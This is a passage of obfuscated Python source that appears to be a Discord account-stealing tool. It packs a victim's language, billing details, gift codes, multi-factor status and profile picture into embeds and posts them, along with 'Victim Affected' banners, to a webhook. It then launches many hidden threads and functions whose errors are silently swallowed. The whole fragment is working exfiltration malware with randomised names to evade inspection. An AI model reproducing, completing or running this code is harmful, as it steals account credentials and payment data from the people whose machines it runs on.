        embed.add_field(name=":earth_africa: Language:", value=f"```{TMJLTCYGIQQEVCDWGFUATKXTHZVADJQGYQEDGGQIQWYKLQZOLXTGUTFHRVJSCBBVJJGUOJJUSJEMQYOPWRDYRDBSAIENHNTYCVV}```", inline=True)
        embed.add_field(name=":moneybag: Billing:", value=f"```{PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW}```", inline=True)
        embed.add_field(name=":gift: Gift Code:", value=f"```{ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG}```", inline=True)
        embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{HBKSGLGXHEYOBUJVMCSROYNZYSNYYWWUNAPQXZCYUFCCADIAIRHIHNVHVFMKARTF}```", inline=True)
        embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
        embed.set_image(url=OYPOKTXARBVGBCKDSUBZVGDWNYAAIJWSGRSLIGECZEHKLLMHFTLSDLSDZUVRDZTGEIVEBZMAVPFHUHTCCDHGEBDM)
        embed.set_footer(text=EYXHIFDNPLCNJBNHHFJGNMUEJBBVNTZLSCWYQYGEWLFYMCOMOCWCZPGRRVBQRZPBOVHZE, icon_url=GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP)
        TGDJIAPQDMGKOATFEYXKIIYCGSBAXXRZCFEMGUBAPCXFBWIDRUMURIQGSSXHQETEQH.send(embed=embed, username=OQKKSBKULTVXSMJTQTJIRXLOQDPHTFIBVNLCBWOIFVQBCAFKTAEGPQPZDWRIXWKZQHBGQZVUGSFPFGTAZNPUFCBLRGRNSTZTBVUL, avatar_url=GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP)

try: requests.post(HPZPFTJUMICLTXQGZGKHNCSONJDNKTSMVJQWNTYXLKMIJRMTXIVKTKNRYALPQCLWDLPAJQQJJFXCUIOVATCBVHR, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': OQKKSBKULTVXSMJTQTJIRXLOQDPHTFIBVNLCBWOIFVQBCAFKTAEGPQPZDWRIXWKZQHBGQZVUGSFPFGTAZNPUFCBLRGRNSTZTBVUL, 'avatar_url': GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP,})
except: pass
try: threading.Thread(target=ZGYNSBGUPETRSISEKWFAJWWZSPUATSPWQIVJLCACNNGQOHRDNIJQHMENWXICPHEADUPNVJPTSKWXNOCRTSBYGVKMIZSEQIWNHNJ).start()
except: pass
try: threading.Thread(target=DMYTGGCZDOHBCHSEAIEWMSQUYBOAOEKMGDNZFFUZNJYKLBYLBHMPJTZLQ).start()
except: pass
try: threading.Thread(target=JNQLOXZWOKYUXRMUNSGEDAMRMEEPXPLQACIRTMOYVDJSRXQQSNCXJKDKYOKZCOFB).start()
except: pass
try: threading.Thread(target=UWETGQVACNQJZWYNMCPEGTYFXDRTJZHXNFQEAPBBPWWMAKXOSDKTXUKFPHFLIYSLKOLOOQSSFSSSLRNSWLIWSJEDYPXNCZRZ).start()
except: pass
try: NZXGRFJJOIQPYWWMWSKYRGADBCFRISMKEDKIRHMEUQOCESGMQFYSNURVXINEPKABVQHOQUXYISYQJOVCDIFAAKBHCYPOEY()
except: pass
try: SVZIKSARLWVCSRMNYTOFBNOXQEOXKSMSVJGBGMBGVPIXEBKQTKIZM()
except: pass
try: OQAHDTFCHIYPUNZTYHUGIDKQUTAPXYPJOEGQUQBTMVFCUDTBDJUGQIIMSQERGNYXSOTMXVWMJWPVEJEOOJQRXXAWNRCMP()
except: pass
try: NOLGTRFQJOJGOSQTCWSIELFWECNSXYBMCUCBWLBBSBUHCDGBUMEYTKUYFMLYZNFEP()
except: pass
try: GLUZZXBURCVNPXUTJIMCSLTDPTDWWKCRXUUQPMSTXKVQZTYUXLUXUXYCXZO()
except: pass
try: XUVKVBKKKTUEDDAZTIRVCYQNYGDBEAJIDHFJWZSGLXKYXOSUGQENUH()
except: pass
try: TSVYJLRGFSGSMATWXJQUAWARRIPZUXCKMKJZTCHLNLMHUNCEQJVIKBA()
except: pass
try: ULAQJDJEVDGHWQBZLSUBFVJOCRSETDPWWVTPMBHZXMYIWSTMXGASYTAUXXVPGKZIITKOZIMKJWIKEDIHLBHNUFYHHY()
except: pass
try: requests.post(HPZPFTJUMICLTXQGZGKHNCSONJDNKTSMVJQWNTYXLKMIJRMTXIVKTKNRYALPQCLWDLPAJQQJJFXCUIOVATCBVHR, json={'content': f'****╚══════════════════{OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY}══════════════════╝****', 'username': OQKKSBKULTVXSMJTQTJIRXLOQDPHTFIBVNLCBWOIFVQBCAFKTAEGPQPZDWRIXWKZQHBGQZVUGSFPFGTAZNPUFCBLRGRNSTZTBVUL, 'avatar_url': GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP})
except: pass
try: threading.Thread(target=MKTZTIKFLPRKVJLAPUWPABUYAKJDTDKPJRNIQJILVLUPIQQAXYVREFBIEPAHQDYXHJTCJHAPRDREHNUMUVLSOBTA).start()
except: pass
try: threading.Thread(target=LOYHROBUNKSGVOKNXQNRBOCTDJGRVHZJFATSFCNHUPQAMPCCXQOYCRYTJVRHDSO).start()
except: pass
try: threading.Thread(target=TZQFAUVDVHAYDRSHXMEIZKEDQMHYLNXCQLNREDRMBHUXAWQWHOJOTJGBTGNXKU).start()
except: pass
try: threading.Thread(target=JFVORJZKMRSJHAUEFTJXWFWAKSXMETNQCKBIXUNLQJRPJBFTJUMAJQCVVZOJBOTPSNVIRZJO).start()
except: pass
